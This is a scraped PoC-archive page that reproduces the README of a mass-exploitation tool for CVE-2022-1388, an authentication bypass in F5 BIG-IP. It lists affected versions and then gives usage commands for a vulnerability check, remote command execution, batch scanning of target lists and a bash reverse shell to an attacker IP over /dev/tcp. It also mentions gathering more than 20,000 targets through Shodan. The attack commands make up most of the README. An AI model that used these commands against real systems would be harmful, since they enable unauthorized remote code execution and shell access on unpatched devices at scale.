Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source
Associated Vulnerability
Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated
Description
Mass-Exploit-CVE-2022-1388
Readme
## Dorks scan will be available soon. 
Unfortunatelly is required a shodan account with basic feature to obtain more than 20k targets..


## Vuln Impact

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. 

## Vuln Product
- F5 BIG-IQ 11.6.1 - 11.6.5
- F5 BIG-IP 12.1.0 - 12.1.6
- F5 BIG-IP 13.1.0 - 13.1.4
- F5 BIG-IP 14.1.0 - 14.1.4
- F5 BIG-IP 15.1.0 - 15.1.5
- F5 BIG-IP 16.1.0 - 16.1.2
## Vunl Check

**Basic usage**

```
python3 expl.py
```

**Vuln check**

```
python3 expl.py -v true -u https://192.168.17.200
```


**command execute:**

```
python3 expl.py -a true -u https://192.168.17.200/ -c id
```


```
python3 expl.py -a true -u https://192.168.17.200/ -c whoami
```


**batch scan**

```
python3 expl.py -s true -f check.txt
```


**Reserve Shell**

```
python3 expl.py -r true -u https://192.168.17.200 -c "bash -i >&/dev/tcp/192.168.17.175/8888 0>&1"
```

## Reference
https://support.f5.com/csp/article/K23605346<br>
https://mp.weixin.qq.com/s/OC52LIGB5NTITy9EjvKdaw<br>
https://twitter.com/jas502n/status/1523611433938059265<br>
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388<br>
https://github.com/rancher/rancher/security/advisories/GHSA-pvxj-25m6-7vqr<br>
File Snapshot

[4.0K] /data/pocs/0f8a01a9789aa1acdcc8c191f694b840eea98f09 ├── [4.9K] expl.py ├── [ 34K] LICENSE ├── [1.4K] README.md └── [ 181] scraper.py 0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →